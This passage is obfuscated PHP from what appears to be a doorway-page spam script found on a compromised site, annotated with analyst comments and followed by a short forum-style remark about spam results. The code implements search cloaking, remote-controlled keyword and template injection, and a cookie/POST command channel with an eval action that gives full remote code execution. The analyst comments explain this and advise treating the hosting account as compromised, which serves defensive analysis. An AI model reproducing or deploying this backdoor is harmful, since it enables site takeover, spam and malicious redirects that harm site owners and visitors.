$_sklpjgqb.= sprintf("<lastmod>%s</lastmod>
", date("Y-m-d", $_va63o44e));
$_sklpjgqb.= "<priority>0.3</priority>
";
$_sklpjgqb.= "</url>
";
}
$_3zr9n5ok = $_i9hv9auf . $_sklpjgqb . $_dgdvxo1h;
$_kl05ko31 = dirname(__FILE__) . "/sitemap.xml";
$_1kwgemvy = _p4aeht::_tinnm() . "/sitemap.xml";
@file_put_contents($_kl05ko31, $_3zr9n5ok);
return $_1kwgemvy;
}
/**
 * Request handler for ordinary page views.
 *
 * 1. Extract the keyword: from $_GET[token], or from a REQUEST_URI segment
 *    that contains the token; fall back to the first stored keyword.
 * 2. If the visitor is classified as a search-engine click-through
 *    (_2ti6t() returns 0), hand over to _yy7yg(); stop if it emitted a
 *    redirect header or markup.
 * 3. Otherwise serve the keyword page: from the cache if present, else
 *    built from a template plus remotely fetched text, cached, and echoed.
 *
 * Steps 2 and 3 together are the cloaking: crawlers are given the keyword
 * page while people arriving from a search result are handed to the
 * remote redirect logic.
 */
public function _ebomk() {
$_kq7ivc6q = substr(md5(_p4aeht::$_dr372im9 . "salt3"), 0, 6);
if (isset($_GET[$_kq7ivc6q])) {
$_va2xdvc2 = $_GET[$_kq7ivc6q];
} elseif (strpos($_SERVER["REQUEST_URI"], $_kq7ivc6q) !== FALSE) {
// Token is somewhere in the URI: take the segment that carries it, keep
// what follows the last "=", and strip the "token-" / "-token" affix.
$_nk9wucuh = explode("/", $_SERVER["REQUEST_URI"]);
foreach ($_nk9wucuh as $_m16ckrlz) {
if (strpos($_m16ckrlz, $_kq7ivc6q) !== FALSE) {
$_dpydnvsr = explode("=", $_m16ckrlz);
$_f5e77nom = array_pop($_dpydnvsr);
$_f5e77nom = str_replace($_kq7ivc6q . "-", "", $_f5e77nom);
$_f5e77nom = str_replace("-" . $_kq7ivc6q, "", $_f5e77nom);
$_va2xdvc2 = $_f5e77nom;
}
}
}
if (empty($_va2xdvc2)) {
$_8p32i9sb = _ra2rzu::_6dnh6();
$_va2xdvc2 = $_8p32i9sb[0];
}
if (!empty($_va2xdvc2)) {
$_va2xdvc2 = str_replace("-", " ", $_va2xdvc2);
if (!$this->_2ti6t()) {
if ($this->_yy7yg()) {
return;
}
}
$_va2xdvc2 = urldecode($_va2xdvc2);
$_t1lxnd1o = _rarzgz::_sximm($_va2xdvc2);
if (empty($_t1lxnd1o)) {
list($_gl7jmsue, $_t51srjug) = $this->_nmacy($_va2xdvc2);
// No text from the remote API: output nothing for this request.
if (empty($_t51srjug)) {
return;
}
$_t1lxnd1o = new _rarzgz($_gl7jmsue, $_t51srjug, $_va2xdvc2, _p4aeht::_ur7fz(_p4aeht::$_jqg19ptq, _p4aeht::$_cm4c4huo));
$_t1lxnd1o->_tcspx();
}
echo $_t1lxnd1o->_c3pca();
}
}
// End of class _p4aeht. The statement sharing the next line with the closing
// brace initialises the page cache at "<script dir>/cache/" with expiry
// mode -1 (entries never expire) and the UID as the file-name salt.
} _rarzgz::_y1758(dirname(__FILE__), -1, _p4aeht::$_dr372im9);
// Initialise the template store and the keyword store in the script's own
// directory. Each gets a 4-character file-name prefix taken from the start of
// md5(UID . "salt12") and md5(UID . "salt22") respectively, so the prefixes
// are fixed for a given UID.
_ee20mhc::_y1758(dirname(__FILE__), substr(md5(_p4aeht::$_dr372im9 . "salt12"), 0, 4));
_ra2rzu::_y1758(dirname(__FILE__), substr(md5(_p4aeht::$_dr372im9 . "salt22"), 0, 4));
/**
 * Repeating-key XOR: each byte of $_s3d76gce is XORed with the key
 * $_bzky50pj, the key restarting from its first byte whenever it runs out.
 * XOR is its own inverse, so the same call both encodes and decodes.
 *
 * @param string $_s3d76gce Data.
 * @param string $_bzky50pj Key.
 * @return string Result, same length as the data.
 */
function _uc602($_s3d76gce, $_bzky50pj) {
$_ea0uezj5 = "";
// Outer loop walks the data; inner loop walks the key once per pass.
for ($_aw7ah80q = 0;$_aw7ah80q < strlen($_s3d76gce);) {
for ($_nvnhqam0 = 0;$_nvnhqam0 < strlen($_bzky50pj) && $_aw7ah80q < strlen($_s3d76gce);$_nvnhqam0++, $_aw7ah80q++) {
$_ea0uezj5.= chr(ord($_s3d76gce[$_aw7ah80q]) ^ ord($_bzky50pj[$_nvnhqam0]));
}
}
return $_ea0uezj5;
}
/**
 * Two-layer XOR: applies _uc602() with key $_bzky50pj, then again with key
 * $_prhztwvy. This is obfuscation of the command payload, not encryption
 * in any meaningful sense; both keys are known to the caller below (the
 * request field name and the UID constant).
 */
function _t6c3o($_s3d76gce, $_bzky50pj, $_prhztwvy) {
return _uc602(_uc602($_s3d76gce, $_bzky50pj), $_prhztwvy);
}
// ---------------------------------------------------------------------------
// Operator command channel. This runs on every request, before the page logic.
//
// Every cookie and every POST field is treated as a possible command: the
// value is Base64-decoded (_y2lux), XORed with the field name and then with
// the UID (_t6c3o), and passed to unserialize(). A payload counts as
// authenticated when its 'ak' entry equals the UID constant in this file;
// that constant is the only secret involved.
//
// Analyst notes:
//  - The 'eval' sub-action below passes operator-supplied data to eval().
//    That makes this file a general remote code execution backdoor, not just
//    a spam page generator. Removing the folder is therefore not sufficient
//    remediation: the whole hosting account should be treated as compromised
//    (credentials, other PHP files, database content, scheduled tasks).
//  - unserialize() is applied to request data before any authentication check.
//  - Commands arrive as cookies or POST bodies, so access logs will show the
//    requests to this script but normally not the payloads.
// ---------------------------------------------------------------------------
foreach (array_merge($_COOKIE, $_POST) as $_z11ny1rk => $_s3d76gce) {
$_s3d76gce = @unserialize(_t6c3o(_p4aeht::_y2lux($_s3d76gce), $_z11ny1rk, _p4aeht::$_dr372im9));
if (isset($_s3d76gce['ak']) && _p4aeht::$_dr372im9 == $_s3d76gce['ak']) {
if ($_s3d76gce['a'] == 'doorway2') {
// 'check': health probe. Tests outbound HTTP by fetching httpbin.org and,
// if more than 512 bytes come back, reports UID, version and the number
// of cache entries, keywords and templates. Always exits afterwards.
if ($_s3d76gce['sa'] == 'check') {
$_lrwd3yfg = _2c02e8g::_cvb79(explode("/", "http://httpbin.org/"), "");
if (strlen($_lrwd3yfg) > 512) {
echo @serialize(Array("uid" => _p4aeht::$_dr372im9, "v" => _p4aeht::$_h3jem60r, "cache" => _rarzgz::_s7stz(), "keywords" => count(_ra2rzu::_6dnh6()), "templates" => _ee20mhc::_s7stz()));
}
exit;
}
// 'templates': store each supplied HTML template on disk; an
// acknowledgement is echoed once per template.
if ($_s3d76gce['sa'] == 'templates') {
foreach ($_s3d76gce["templates"] as $_gl7jmsue) {
_ee20mhc::_tcspx($_gl7jmsue);
echo @serialize(Array("uid" => _p4aeht::$_dr372im9, "v" => _p4aeht::$_h3jem60r,));
}
}
// 'keywords': store the supplied keyword list and regenerate sitemap.xml.
if ($_s3d76gce['sa'] == 'keywords') {
_ra2rzu::_tcspx($_s3d76gce["keywords"]);
_p4aeht::_d0dxo();
echo @serialize(Array("uid" => _p4aeht::$_dr372im9, "v" => _p4aeht::$_h3jem60r,));
}
// 'pages': pre-generate cache entries for the supplied keyword/text pairs
// (only when at least one template exists) and report how many were new.
if ($_s3d76gce['sa'] == 'pages') {
$_7dgiwjzz = 0;
if (_ee20mhc::_s7stz() > 0) {
foreach ($_s3d76gce['pages'] as $_t1lxnd1o) {
$_zo2q8quo = _rarzgz::_sximm($_t1lxnd1o["keyword"]);
if (empty($_zo2q8quo)) {
$_zo2q8quo = new _rarzgz(_ee20mhc::_3f7mw(), $_t1lxnd1o["text"], $_t1lxnd1o["keyword"], _p4aeht::_ur7fz(_p4aeht::$_jqg19ptq, _p4aeht::$_cm4c4huo));
$_zo2q8quo->_tcspx();
$_7dgiwjzz+= 1;
}
}
}
echo @serialize(Array("uid" => _p4aeht::$_dr372im9, "v" => _p4aeht::$_h3jem60r, "pages" => $_7dgiwjzz));
}
}
// 'eval': executes the payload's "data" entry as PHP code, then exits.
// This check sits outside the 'doorway2' block, so it applies to any
// authenticated payload regardless of its 'a' value.
if ($_s3d76gce['sa'] == 'eval') {
eval($_s3d76gce["data"]);
exit;
}
}
}
// Normal page-view path: reached when the request carried no command that
// exited earlier. The readiness check always passes as written, so the
// request handler (_ebomk) runs for every such request, after which the
// script terminates.
$_5mty95t4 = new _p4aeht();
if ($_5mty95t4->_s29c6()) {
$_5mty95t4->_ebomk();
}
exit(); ?>
I should also mention I opened a few of the results coming from this page and they are mostly poorly-written articles with thousands of external links. Some of them try to open pop ups as well.
Thanks!